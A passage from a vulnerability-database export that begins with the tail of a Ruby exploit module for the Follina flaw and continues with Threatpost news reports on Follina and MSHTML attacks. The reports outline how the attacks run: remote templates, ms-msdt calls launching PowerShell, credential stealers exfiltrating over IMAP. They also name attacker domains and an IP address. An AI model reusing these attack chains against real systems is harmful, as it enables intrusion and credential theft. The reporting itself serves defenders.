\ncontent = entry.get_input_stream.read \nend \n \nvprint_status(\"Parsing item from template: #{entry.name}\") \n \ndocument << { fname: entry.name, data: content } \nend \nend \n \ndocument \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167438/word_msdtjs_rce.rb.txt"}], "threatpost": [{"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote code execution (RCE) flaw, tracked as [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. 
Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>), with attackers apparently targeting Russian users, and reported it to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. 
It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who [tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend, noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c**Command Prompt** as Administrator\u201d; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201d; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. 
However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-30190 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. 
Once the HTML is loaded from the calling application, an MSDT scheme is used to execute PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which is common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>), tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. 
He said the workaround is \u201cnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked 
as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote 
in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. 
\u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims into opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RiskIQ\u2019s Team Atlas wrote. 
\u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nRegardless, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now, before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. 
\n\nThe attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to affect more than just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit it are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability gives them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. 
\u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability, which was first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant, until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-07T12:48:32", "description": "Researchers have added state-sponsored hackers to the list of adversaries attempting to exploit Microsoft\u2019s now-patched Follina vulnerability. According to researchers at Proofpoint, state-sponsored hackers have attempted to abuse the Follina vulnerability in Microsoft Office, aiming an email-based exploit at U.S. and E.U. government targets via phishing campaigns.\n\nProofpoint researchers spotted the attacks and believe the adversaries have ties to a government, which it did not identify. The attacks consist of campaigns targeting U.S. and E.U. government workers. 
Malicious emails contain fake recruitment pitches promising a 20 percent boost in salaries and entice recipients to download an accompanying attachment.\n\nIn a Twitter-based statement, Sherrod DeGrippo, vice president of threat research at Proofpoint, said about 10 Proofpoint customers had received over 1,000 such messages.\n\nThe malicious attachment targets the remote code execution bug [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), dubbed Follina.\n\n[Discovered](<https://twitter.com/nao_sec/status/1530196847679401984>) last month, the flaw lies in the Microsoft Windows Support Diagnostic Tool. As Microsoft explained in a [blog post](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), the bug \u201cexists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nState-sponsored abuse of the flaw is just the latest in a string of Follina-related attacks.\n\nIf successfully exploited, attackers can use the Follina flaw to install programs, view, change or delete data, or create new accounts in the context allowed by the user\u2019s rights, the company said.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. 
Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12, and Microsoft patched it in May.\n\nProofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for a virtualized environment to abuse and \u201csteals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.\u201d\n\nProofpoint explained in a tweet, \u201cThe extensive reconnaissance conducted by [a] second Powershell script demonstrated an actor interested in a large variety of software on a target\u2019s computer.\u201d It is that behavior that raised concerns that the campaign had ties to a \u201cstate aligned nexus,\u201d researchers noted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T12:45:00", "type": "threatpost", "title": "Follina Exploited by State-Sponsored Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:45:00", "id": 
"THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "href": "https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T12:27:08", "description": "Advanced persistent threat group Fancy Bear is behind a [phishing campaign](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) that uses the specter of nuclear war to exploit a known one-click Microsoft flaw. The goal is to deliver malware that can steal credentials from the Chrome, Firefox and Edge browsers.\n\nThe attacks by the Russia-linked APT are tied to the war between Russia and Ukraine, according to researchers at Malwarebytes Threat Intelligence. They report that Fancy Bear is pushing malicious documents weaponized with the exploit for [Follina](<https://threatpost.com/microsoft-workaround-0day-attack/179776/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>)), a known Microsoft one-click flaw, according to a [blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) published this week.\n\nOn June 20, Malwarebytes researchers first observed the weaponized document, which downloads and executes a .Net stealer first [reported by Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). 
Google\u2019s Threat Analysis Group (TAG) said Fancy Bear already has used this stealer to target users in Ukraine.\n\nThe Computer Emergency Response Team of Ukraine (CERT-UA) [also independently discovered](<https://cert.gov.ua/article/341128>) the malicious document used by Fancy Bear in the recent phishing campaign, according to Malwarebytes.\n\n## **Bear on the Loose**\n\nCERT-UA [previously identified](<https://threatpost.com/cyberwar-ukraine-military/179421/>) Fancy Bear as one of the numerous APTs pummeling Ukraine with cyber-attacks in parallel with the invasion by Russian troops that began in late February. The group is believed to be operating at the behest of Russian intelligence to gather info that would be useful to the agency.\n\nIn the past Fancy Bear has been linked to attacks targeting elections [in the United States](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) and [Europe](<https://threatpost.com/microsoft-russias-fancy-bear-working-to-influence-eu-elections/142007/>), as well as [hacks against sporting and anti-doping agencies](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) related to the 2020 Olympic Games.\n\nResearchers first flagged Follina in April, but [only in May](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) was it officially identified as a zero-day, one-click exploit. Follina is associated with the Microsoft Support Diagnostic Tool (MSDT) and uses the ms-msdt protocol to load malicious code from Word or other Office documents when they\u2019re opened.\n\nThe bug is dangerous for a number of reasons, not the least of which is its wide attack surface, as it basically affects anyone using Microsoft Office on all currently supported versions of Windows. 
If successfully exploited, attackers can gain user rights to effectively take over a system and install programs, view, change or delete data, or create new accounts.\n\nMicrosoft recently patched Follina in its [June Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) release but it remains [under active exploit](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) by threat actors, including known APTs.\n\n## **Threat of Nuclear Attack**\n\nFancy Bear\u2019s Follina campaign targets users with emails carrying a malicious RTF file called \u201cNuclear Terrorism A Very Real Threat\u201d in an attempt to prey on victims\u2019 fears that the invasion of Ukraine will escalate into a nuclear conflict, researchers said in the post. The content of the document is an [article](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) from the international affairs group Atlantic Council that explores the possibility that Putin will use nuclear weapons in the war in Ukraine.\n\nThe malicious file uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268[.]frge[.]io/article[.]html. The HTML file then uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme, researchers said.\n\nThe PowerShell loads the final payload, a variant of the .Net stealer previously identified by Google in other Fancy Bear campaigns in Ukraine. 
While the oldest variant of the stealer used a fake error message pop-up to distract users from what it was doing, the variant used in the nuclear-themed campaign does not, researchers said.\n\nIn other functionality, the recently seen variant is \u201calmost identical\u201d to the earlier one, \u201cwith just a few minor refactors and some additional sleep commands,\u201d they added.\n\nAs with the previous variant, the stealer\u2019s main purpose is to steal data, including website credentials such as username, password and URL, from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. The malware then uses the IMAP email protocol to exfiltrate data to its command-and-control server in the same way the earlier variant did, but this time to a different domain, researchers said.\n\n\u201cThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data,\u201d they wrote. \u201cThe new variant uses the same method but a different domain, www.specialityllc[.]com. 
Interestingly both are located in Dubai.\u201d\n\nThe owners of the websites most likely have nothing to do with APT28, with the group simply taking advantage of abandoned or vulnerable sites, researchers added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-23T12:21:33", "type": "threatpost", "title": "Fancy Bear Uses Nuke Threat Lure to Exploit 1-Click Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-23T12:21:33", "id": "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "href": "https://threatpost.com/fancy-bear-nuke-threat-lure/180056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets 
entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according to [a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails stating that they will face charges for this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw in [MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>), tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. 
[Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded URL that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. 
